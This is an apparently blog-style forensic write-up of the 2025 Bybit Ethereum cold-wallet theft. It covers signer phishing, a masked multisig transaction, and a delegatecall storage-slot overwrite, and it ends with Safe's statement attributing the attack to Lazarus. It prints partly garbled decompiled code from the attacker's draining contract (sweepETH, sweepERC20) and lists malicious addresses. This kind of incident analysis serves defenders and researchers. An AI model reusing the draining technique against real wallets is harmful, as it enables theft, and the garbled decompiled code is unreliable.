Deep dive to Bybit suffers hack of $1.4 Billion in Ethereum (ETH): Attacks, techniques, and anonymity

Bybit is a cryptocurrency exchange that allows users to trade digital assets such as Bitcoin, Ethereum, and other cryptocurrencies. It is well-known for its leverage trading options, which allow customers to borrow funds to increase the size of their trading positions. This may enhance both earnings and hazards.

Bybit provides a variety of trading services, including spot trading (buying and selling cryptocurrency at market prices) and derivatives trading (such as perpetual contracts and futures). It also offers advanced charting tools, automated trading bots, and risk management solutions.

On February 21, 2025, at 02:16:11 PM UTC, the Bybit is cold ethereum wallet (hxxps://etherscan[.]io/address/0x1db92e2eebc8e0c075a02bea49a2935bcd2dfcf4) was drained by a malicious contract upgrade.

The attacker used phishing attacks against cold wallet signers, resulting in the incorrect signing of malicious transactions. Bybit is CEO also stated that this particular transaction was masked, with a legitimate transaction displayed on the Safe (a wallet provider) UI and the malicious transaction data sent to Ledger. The term “musked” refers to an obscured or faked transaction payload. The attacker was able to gather three valid signatures to authorize a transaction that substituted the Safe’s multi-sig wallet implementation contract with a malicious one, allowing them to drain the wallet us money. This vulnerability led in an estimated loss of around $1.46 billion in digital assets, principally Ethereum tokens, making it the greatest Web3 breach in history.

The organization linked the Bybit breach to the Phemex theft by combining stolen cash from both instances on-chain, proving a direct link between the two attacks.

Overlap address: 0x33d057af74779925c4b2e720a820387cb89f8f65 Bybit hack txns on Feb 22, 2025:

0xc963e65b9ec39b11076f78990c31f29aaa80705c75312dafd1748479e3e94ed0

0x411374feedcfa560335f00c0fcfa0a3906fdcc33687e6f924dd78ebecc45cd00

Phemex hack txns on Feb 20, 2025:

0x6262a3339842240aeebae4ebfe338dbc771aa0e2df8f5a1ebcd7f9b090bedfe3

The phases of attacks:
This one is originated from wallet address 0x47666fab8bd0ac7003bce3f5c3585383f09486e2, which executed an ExecTransaction on the Gnosis Safe multisig proxy contract.

Attack phases:

1. Phishing — Phishing is a form of cyberattack in which a malicious actor tries to deceive individuals into revealing sensitive information, such as usernames, passwords, credit card details, or other personal data. The attacker identified each multisig signer responsible for authorizing transactions.
2. Initial transaction — the first transaction conducted in a newly created cryptocurrency wallet or account. It can also denote the first transaction in a new cryptocurrency project, such as the initial distribution of tokens or coins to participants. The signers engaged with a fraudulent UI that appeared to display a legitimate transaction. The details, including the URL, seemed to originate from @safe, a trusted multisig wallet provider.
3. Contract manipulation — refers to exploiting vulnerabilities or flaws in smart contracts or decentralized applications (dApps) to modify their intended behavior or results. Malicious actors may use this manipulation to gain an unfair advantage, such as executing unauthorized transactions, altering contract terms, or stealing funds. After approving the transaction, the signers unintentionally transferred control of the cold wallet to the attacker.
4. Funds extraction — the illegal act of withdrawing or stealing funds from a crypto wallet, exchange, or smart contract. This usually involves exploiting vulnerabilities or flaws in the system to gain unauthorized access and transfer funds.The attacker then performed a delegate call with the stolen keys to their contract at 0xbdd077f651ebe7f7b3ce16fe5f2b025be2969516, activating the transfer function.

Since the malicious contract was unverified, it had to be decoded to understand the functionality of the transfer.

function transfer (address recipient, uint256 amount) public payable { find similar require(msg.data.length — 4 >= 64);
require(msg.sender == 0xfa09c3a328792253f8dee7116848723b72a6d2e, Error(‘Ownable: caller is not the owner’)); transfer recipient;

The code contained in the malicious contract overwrote the _transfer address in SLOT[0] of the contract, triggering the function in the original ByBit contract. Since the attacker’s contract defines _transfer as its first state variable, when called via delegatecall, this storage slot corresponds to the target contract’s SLOT[0]. As a result, when the Safe multisig executes the delegatecall to this contract, the malicious contract’s code runs within the context of the Safe contract. By overwriting this slot, the attacker was able to manipulate the contract’s behavior, redirecting subsequent delegations to the attacker’s contract at 0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516

The attacker’s contract contains Sweep functions, which were triggered through delegation to transfer funds:

function sweepETH (address receiver) public payable { find similar
}
require(msg.data.length — 4 >= 32);
require(msg.sender == 0xfa09c3a328792253f8dee7116848723b72a6d2e, Error(‘Ownable: caller is not the owner’)); ve = receiver.call().value(this.balance). gas (2300
Ithis.balance);
require (bool(ve), 0, RETURNDATASIZE()); // checks call status, propagates error data on error
function sweepERC20 (address token, address to) public payable { find similar
}
require(msg.data.length — 4 >= 64);
require(msg.sender == 0xfa09c3a328792253f8dee7116848723b72a6d2e, Error(‘Ownable: caller is not the owner’)); ve, /* uint256 */ v1 = token.balanceOf(this).gas(msg.gas);
require (bool(ve), 0, RETURNDATASIZE()); // checks call status, propagates error data on error require (MEM[64] + RETURNDATASIZE() — MEM[64] >= 32);
MEM[MEM[64] + 68] = v1;
v2= v3 = 0;
while (v2 >= 68) {
}
MEM[v2 + MEM[64]] = MEM[32 + (MEM[64] + v2)];
v2 += 32;
MEM[MEM[64] + 68] = 0;
v4, /* uint256 */ v5 = token.call(68, 0xa9059cbb, to).gas (msg.gas);
if (RETURNDATASIZE() != 0) {
}
v6 = new bytes[] (RETURNDATASIZE());
RETURNDATACOPY (v6.data, 0, RETURNDATASIZE());
require(v4, Error(‘Token transfer failed’));

Serios of transactions:

The following Ethereum addresses are malicious

0x09278b36863bE4cCd3d0c22d643E8062D7a11377 0x0e8C1E2881F35Ef20343264862A242FB749d6b35 0x140c9Ab92347734641b1A7c124ffDeE58c20C3E3 0x1512fcb09463A61862B73ec09B9b354aF1790268 0x1542368a03ad1f03d96D51B414f4738961Cf4443 0x1bb0970508316DC735329752a4581E0a4bAbc6B4 0x1eB27f136BFe7947f80d6ceE3Cf0bfDf92b45e57 0x21032176B43d9f7E9410fB37290a78f4fEd6044C 0x2290937A4498C96eFfb87b8371a33D108F8D433f 0x23Db729908137cb60852f2936D2b5c6De0e1c887 0x30a822CDD2782D2B2A12a08526452e885978FA1D 0x3A21F4E6Bbe527D347ca7c157F4233c935779847 0x40e98FeEEbaD7Ddb0F0534Ccaa617427eA10187e 0x4C198B3B5F3a4b1Aa706daC73D826c2B795ccd67 0x51E9d833Ecae4E8D9D8Be17300AEE6D3398C135D 0x52207Ec7B1b43AA5DB116931a904371ae2C1619e 0x55CCa2f5eB07907696afe4b9Db5102bcE5feB734 0x5Af75eAB6BEC227657fA3E749a8BFd55f02e4b1D 0x660BfcEa3A5FAF823e8f8bF57dd558db034dea1d 0x684d4b58Dc32af786BF6D572A792fF7A883428B9

Safe{Wallet} Statement on Targeted Attack on Bybit

tl;dr

• Forensic findings confirm targeted attack on ByBit by Lazarus
• Safe smart contracts unaffected, an attack was conducted by compromising a Safe {Wallet} developer machine which affected an account operated by Bybit
• Safe{Wallet} has added security measures to eliminate the attack vector.

Full Statement

• The forensic review into the targeted attack by the Lazarus Group on Bybit concluded that this attack targeted to the Bybit Safe was achieved through a compromised machine of a Safe{Wallet} developer resulting in the proposal of a disguised malicious transaction. Lazarus is a state-sponsored North Korean hacker group that is well known for sophisticated social engineering attacks on developer credentials, sometimes combined with zero-day exploits.
• Important! The forensic review of external security researchers did NOT indicate any vulnerabilities in the Safe smart contracts or source code of the frontend and services.
• Following the recent incident, the Safe{Wallet} team conducted a thorough investigation and have now restored Safe{Wallet} on Ethereum mainnet with a phased rollout. The Safe{Wallet} team has fully rebuilt, reconfigured all infrastructure, and rotated all credentials, ensuring the attack vector is fully eliminated.
• Pending the final results of the investigation, the Safe{Wallet} team will publish a full post-mortem.
• The Safe{Wallet} frontend remains operational with additional security measures in place. However, users need to exercise extreme caution and remain vigilant when signing transactions.
• Safe commits to lead an industry-wide initiative to increase verifiability of transactions, which is an ecosystem-wide challenge.
• Safe remains committed to security, transparency, self-custody, and pushing the industry forward.

Source: https://x.com/safe/status/1894768522720350673